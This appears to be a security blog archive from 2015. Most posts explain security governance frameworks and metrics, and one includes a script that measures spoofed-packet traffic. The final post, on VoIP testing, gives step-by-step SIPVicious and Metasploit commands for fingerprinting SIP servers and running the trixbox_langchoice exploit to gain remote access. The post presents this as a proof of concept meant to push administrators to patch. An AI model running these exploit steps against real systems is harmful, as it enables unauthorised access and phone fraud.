
28 September 2015

Approaches to a Security Framework

I'm going to give you a quick rundown of several standardized methodologies for building a security framework, as they relate to information security governance.

COBIT: It stands for Control Objectives for Information and related Technology. It's a set of best practices, or a framework, for Information Technology management. It was first published by ISACA in 1996 and later developed together with the IT Governance Institute (ITGI). COBIT gives managers, IT users, IT supervisors, technicians and auditors a framework of generally accepted practices, measurements and indicators to help maximize the benefits derived from the use of information technology.

CMM – Capability Maturity Model: It's also referred to as the Software CMM or SW-CMM. CMM is a process capability model based on software development processes and practices. The Software CMM is no longer maintained: work on a new version of it stopped in 1997 and it was superseded by CMMI, Capability Maturity Model Integration, which is used by many organizations to understand the maturity of their process capability in a wide range of areas, including software engineering, risk management, project management, information technology, systems engineering and people management.

Balanced Scorecard: It's a concept for measuring whether the activities of a company are actually meeting its objectives and supporting its overall strategy, mission and vision. It looks at financial outcomes, but also at the customer, internal process and learning perspectives, including human issues. The balanced scorecard provides a comprehensive view of the business, not just from a financial standpoint, and it helps the organization improve its long-term planning and meet its long-term goals.

SABSA: The Sherwood Applied Business Security Architecture is a methodology for enterprise security architecture and service management. It develops risk-driven enterprise information security architectures for delivering security infrastructure solutions that support critical business initiatives. Its primary characteristic is that everything must be derived from an analysis of the business requirements for security. Therefore, it's entirely business-driven rather than technology-driven.

ISO 27002: It belongs to the growing ISO/IEC 27000 family of information security standards and is often used in combination with COBIT. ISO/IEC 27002 is the code of practice for information security controls: it provides best practices and recommendations on information security management for those responsible for implementing and maintaining an information security management system (ISMS), whose requirements are specified in ISO/IEC 27001.

GAISP: The Generally Accepted Information Security Principles gave us a clear picture of the essential security principles, practices and assurances for an organization. Many people considered it a central checklist for security strategies and plans of action. However, the project was abandoned and this framework is now dead.

Best regards my friend and remember, if you have any question, go ahead!!

21 September 2015

Information Security Governance Metrics

The term metrics simply denotes a measurement taken against a reference. For example, if we want to measure how secure the email system is, we would use metrics such as how much information is sent in clear text, or what types of file attachments can be accepted or sent by email. Those kinds of things.

Metrics involve at least two points: the measurement itself and some form of reference. Security is the state of being protected, or the absence of danger, therefore we need particular metrics to measure against. For example, to declare security "weak" or "strong" we need some type of measurement and some reference point. Therefore, security metrics should tell us the degree of safety relative to some reference point.

How do we determine what effective metrics are? If we can't measure it, it's difficult to manage it. Standard, ordinary security measurements make effective metrics: downtime due to a trojan horse, downtime due to a denial-of-service attack, or the number of penetrations into a system from outside our firewall. If we can measure the impact as an actual, quantifiable loss of time or data due to a threat or attack, we have effective metrics. The larger the organization, the larger the number of available metrics. The bottom line is that effective metrics always deliver results, and they provide security that meets the business needs.

There are four main components of security metrics:
  • Results-oriented metrics analysis: The whole purpose of metrics is to lead us somewhere, to improve the organization. If we don't use these metrics in analysis to get results, they are a waste of time.
  • Quantifiable performance metrics: Metrics have to be mathematically quantifiable, based on different performance attributes. For example, the number of IP packets hitting our external router with a spoofed source IP address is quantifiable.
  • Practical security policies and procedures: Security policies and procedures have to be practical; metrics need to be based on realistic, day-to-day security policies and procedures. Metrics come from our security policy, so the security policy dictates what types of metrics we can use.
  • Strong upper-level management support: Our security metrics must have strong support from upper-level management. What is the point of creating reports based on particular metrics if upper-level management is not going to act on them or budget to mitigate the problems they reveal?
Another couple of key metrics are KGIs (Key Goal Indicators) and KPIs (Key Performance Indicators), which are used in the balanced scorecard presented to the board of directors.
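As an added example (not code from the original post), here is the spoofed-packet metric from the list above turned into something quantifiable with a reference point: a count of inbound packets on the external interface whose source address belongs to a range that can never legitimately arrive from the Internet (RFC 1918, loopback, link-local), expressed as a share of all inbound packets and compared against a policy ceiling. The log lines follow the iptables LOG format but are constructed, and the interface name and the ceiling are assumptions.

```python
"""Turn a firewall log into a quantifiable security metric with a reference.

Metric: inbound packets on the Internet-facing interface whose source is a
bogon/private address (spoofed). Both the raw count and the ratio are
returned, because a number only means "weak" or "strong" relative to a
reference point set by policy.
"""
import ipaddress
import re
from collections import Counter

# Constructed sample lines in iptables LOG format (not real traffic).
SAMPLE_LOG = """\
Sep 21 10:00:01 fw kernel: IN=eth0 OUT= SRC=203.0.113.5 DST=198.51.100.10 PROTO=TCP SPT=40000 DPT=443
Sep 21 10:00:02 fw kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=198.51.100.10 PROTO=TCP SPT=1234 DPT=22
Sep 21 10:00:03 fw kernel: IN=eth0 OUT= SRC=192.168.1.50 DST=198.51.100.10 PROTO=UDP SPT=53 DPT=53
Sep 21 10:00:04 fw kernel: IN=eth1 OUT= SRC=192.168.1.50 DST=203.0.113.9 PROTO=TCP SPT=55000 DPT=80
Sep 21 10:00:05 fw kernel: IN=eth0 OUT= SRC=127.0.0.1 DST=198.51.100.10 PROTO=TCP SPT=1 DPT=22
Sep 21 10:00:06 fw kernel: IN=eth0 OUT= SRC=198.51.100.77 DST=198.51.100.10 PROTO=TCP SPT=4444 DPT=25
"""

EXTERNAL_IF = "eth0"  # assumed name of the Internet-facing interface

# Source ranges that cannot legitimately appear on inbound Internet traffic.
BOGON_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",  # RFC 1918
    "127.0.0.0/8",                                     # loopback
    "169.254.0.0/16",                                  # link-local
    "0.0.0.0/8",
)]

# IN=<interface> ... SRC=<address>
LINE_RE = re.compile(r"IN=(?P<inif>\S*)\s.*?SRC=(?P<src>\S+)")


def is_spoofed_source(src: str) -> bool:
    """True if the source address lies in a range that must not come from outside."""
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in BOGON_NETS)


def spoofed_inbound_metric(log_text: str, external_if: str = EXTERNAL_IF) -> dict:
    """Measure inbound packets on the external interface with spoofed sources."""
    total = 0
    spoofed = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m or m.group("inif") != external_if:
            continue  # outbound traffic and other interfaces don't count
        total += 1
        if is_spoofed_source(m.group("src")):
            spoofed[m.group("src")] += 1
    count = sum(spoofed.values())
    return {
        "inbound_total": total,
        "spoofed_count": count,
        "spoofed_ratio": count / total if total else 0.0,
        "top_sources": spoofed.most_common(3),
    }


def rate_against_reference(metric: dict, max_ratio: float) -> str:
    """The reference point: a policy-set ceiling on the spoofed share."""
    return "weak" if metric["spoofed_ratio"] > max_ratio else "strong"


if __name__ == "__main__":
    m = spoofed_inbound_metric(SAMPLE_LOG)
    print(m)
    # Assumed policy: more than 1% spoofed inbound traffic means ingress
    # filtering upstream or on the router is not doing its job.
    print("anti-spoofing posture:", rate_against_reference(m, max_ratio=0.01))
```

The same shape (count, ratio, reference) works for the email example: replace the bogon check with "was the message delivered without TLS" and the ceiling with the policy's allowed share of clear-text mail.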

Regards my friend and remember, if you want to improve, you have to measure with proper metrics.

14 September 2015

Information Security Governance

Two years ago I wrote about IT Governance, and today I want to write about the six main outcomes of Information Security Governance:

Strategic Alignment

This is the alignment of information security in support of all the organization's objectives; it is very desirable but difficult to achieve. If we align the security strategy with the goals and objectives of the business, we will have a cost-effective and efficient organization. In the security strategy we have to define the security objectives in business terms and in terms of business objectives, articulating them from the planning phase through the documentation phase: policies, standards, procedures, technologies and processes.

Risk Management

This is the ultimate objective of all infosec activities. Risk management is the process of executing the right measures to mitigate risk and reduce any potential impact on data or information resources to an acceptable level. We should understand the organization's risk threshold, the risk exposure and the potential consequences of any kind of compromise or vulnerability, and be aware of the priorities in risk management, the risk mitigation process, etc.

Value Delivery

This happens when the investment in security is optimized to support the organizational objectives. In other words, we have to squeeze as much value as we can out of our security mechanisms: all our devices, hardware, software and personnel. We should try to maximize the output and the results for the lowest possible cost. Therefore, value delivery happens when our strategic goals for security are achieved with an acceptable risk posture at the lowest possible cost.

Resource Management

Resource management can be defined as the processes involved in planning, allocating and managing information security resources. This includes people, technology and logical processes such as techniques and methodologies, all with the goal of improving the effectiveness and efficiency of our business solutions. How do we know if we have effective resource management processes in place? If we have a systematic procedure to deal with problems that appear over and over again, we have effective and efficient resource management processes.

Performance Analysis

This is the process of measuring, reporting and monitoring the information security processes, all with the key goal of improvement. We can't manage what we can't measure. If we aren't measuring with solid metrics, using standardised methodologies, we can't analyse performance to improve the organization and the security program. Two useful measurements are the time it takes to detect and report incidents, and the number of incidents and their frequency: with those, we can find out whether our controls are effective.

Integration

This is the process of converging our information security processes with business processes. Integration is closely related to the concept of strategic alignment, but integration is the practical side of alignment: strategic alignment is handled at the upper and operational management levels, while integration is the real-world, day-to-day work, from the top down, in the actual processes.

Regards my friend and remember, leave a comment with the first thing you're thinking.

7 September 2015

Playing with VoIP systems

This week I've had to fight with VoIP systems like Trixbox, which is built on Asterisk, and Brekeke. My main task was searching for vulnerabilities and weaknesses in these systems, to demonstrate that if we don't upgrade our VoIP systems we allow attackers to make calls anywhere without restriction, to access our phone directory, or even to access the VoIP system remotely.

Some people think that, because they use branded VoIP systems like Cisco, Avaya or Alcatel, they don't have this kind of weakness, but that's wrong: most of them have vulnerabilities as well.

The first thing I did was use the open source distribution VIPER VAST, which bundles SIPVicious and Metasploit, to play with them and find out which exploits I could use to attack VoIP systems. Before attacking the systems, we need to know which software and version they are running. A SIP server usually announces this in the Server or User-Agent header of its reply to an OPTIONS request, which is exactly what SIPVicious and the Metasploit scanner send:

SIPVicious → the scanner is svmap.py, found in /vast/sipvicious/ on VAST: /vast/sipvicious/svmap.py IP

Metasploit in the VAST distribution lives at /opt/metasploit-4.4.0/msf3/msfconsole.
We can use the following module to scan the VoIP system:

msf > use auxiliary/scanner/sip/options
msf auxiliary(options) > set RHOSTS IP
msf auxiliary(options) > run

Once we know the software version, we can search for exploits:

msf > search freepbx
msf > search asterisk
msf > search sip
msf > search voip


In this proof of concept (PoC) we want to attack Trixbox systems, so we should also search by trixbox:

msf > search trixbox

The CVE entry for this vulnerability tells us which Trixbox versions are affected and how serious the weakness is.

Then … we want to know what happens when we launch this exploit against our VoIP system. Test it yourself with the following commands:

msf > use unix/webapp/trixbox_langchoice
msf exploit(trixbox_langchoice) > set RHOST IP
msf exploit(trixbox_langchoice) > exploit

As you'll be able to see, you get remote access to the Trixbox system and can do whatever you want with it.

VoIP systems are hard to touch: once one is working, nobody wants to apply patches or upgrade the operating system. But this is a task we must do if we want to sleep soundly every night and not find an excessive phone bill, regardless of whether we use branded or open source VoIP systems.

Regards my friend and remember, leave a comment with the first thing you're thinking.
